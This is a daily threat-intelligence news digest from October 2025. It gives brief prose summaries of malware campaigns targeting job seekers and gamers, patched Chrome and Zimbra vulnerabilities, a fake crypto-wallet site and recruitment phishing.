Cyware Daily Threat Intelligence, October 08, 2025

BatShadow is casting a net over job seekers with fake offers laced with Vampire Bot malware. Vietnamese hackers deliver ZIPs disguised as corporate docs, tricking victims into Edge-specific downloads that unleash PowerShell payloads and remote desktop access.

Chrome 141 is slamming the door on three code-execution flaws that could let attackers run wild. High-severity bugs in Sync and Storage, plus a medium out-of-bounds read in WebCodecs, demand user interaction with crafted web content, now patched for safety.

A slick fake Best Wallet site is reeling in crypto users with a phony Captcha security ruse. Mimicking the real app's look, it prompts wallet connections to snag private keys and seed phrases, blurring the line between legit and lethal.

Top Malware Reported in the Last 24 Hours

BatShadow uses new Vampire Bot malware

The Vietnamese threat actor group BatShadow is conducting a new campaign targeting job seekers and digital marketing professionals using social engineering tactics to distribute a Go-based malware named "Vampire Bot." Malicious files disguised as job descriptions and corporate documents are delivered via ZIP archives containing decoy PDFs and harmful LNK or executable files. Victims are tricked into opening these files, triggering an infection chain involving PowerShell scripts to download additional payloads, including remote desktop software for persistent access. The attackers exploit browser-specific behaviors, instructing victims to use Microsoft Edge to bypass security restrictions and download malicious files.

Fake game links spread hidden malware

Fake indie game pages impersonating legitimate platforms like itch[.]io are being used to distribute malware through social engineering tactics. Attackers send messages via compromised accounts, enticing users to download seemingly harmless game files. Upon execution, these files run hidden processes that deploy stealthy loaders, utilizing PowerShell commands and memory-only scripts to avoid detection. Users may notice unusual behavior, such as the absence of installer interfaces and the sudden appearance of new folders. This deceptive method preys on the trust within gaming communities, transforming a casual interaction into a serious security threat. The malware's design allows it to remain undetected while preparing the infected device for further malicious activities.

Top Vulnerabilities Reported in the Last 24 Hours

Google fixes critical Chrome vulnerabilities

Google has released Chrome version 141.0.7390.65/.66 to address three critical security vulnerabilities that could allow attackers to execute arbitrary code. These flaws include CVE-2025-11458, a high-severity heap buffer overflow in Chrome Sync and CVE-2025-11460, another high-severity issue involving a use-after-free error in the Storage component. Additionally, CVE-2025-11211 is a medium-severity out-of-bounds read in WebCodecs, reported by Jakob Košir. All three vulnerabilities require user interaction with specially crafted web content to be exploited, making them particularly dangerous. 

CISA warns of Zimbra 0-day 

CISA has issued a warning about a zero-day cross-site scripting vulnerability in the Zimbra Collaboration Suite (ZCS), which is currently being exploited by attackers. This flaw arises from insufficient sanitization of HTML in calendar invitation files (ICS) viewed in the Classic Web Client. Attackers can craft malicious ICS entries that execute embedded JavaScript when users open the attachments, allowing them to hijack user sessions, steal sensitive data, and alter email filters. The vulnerability has a CVSS score of 7.5, indicating high severity, and affects all supported versions of ZCS with the Classic Web Client. 

Top Scams Reported in the Last 24 Hours

Best Wallet cryptocurrency scam

A new cryptocurrency scam is targeting users of the Best Wallet app, aiming to deceive them into connecting their wallets to a fraudulent website. This site closely resembles the legitimate Best Wallet platform and employs a Captcha to create an illusion of security. Once users interact with the site, they are prompted to connect their wallets, which can lead to the theft of private keys, seed phrases, and other sensitive information. The scammers have designed the fake site to mimic the original's branding and content, making it difficult for users to discern the difference. 

Phishing campaign impersonates Fortune 500 firms

A phishing campaign targeted job seekers in social media and marketing roles by impersonating prominent brands like Tesla, Google, Ferrari, and Red Bull through fake job applications. The attackers cleverly crafted emails using legitimate-sounding addresses to gain the trust of potential victims. They incorporated tailored URLs and authentic logos, creating a deceptive sense of credibility. The phishing process often led candidates to counterfeit login pages, including Glassdoor and Facebook, where they were prompted to enter personal information or upload resumes. This tactic not only harvested login credentials but also collected additional PII for further exploitation.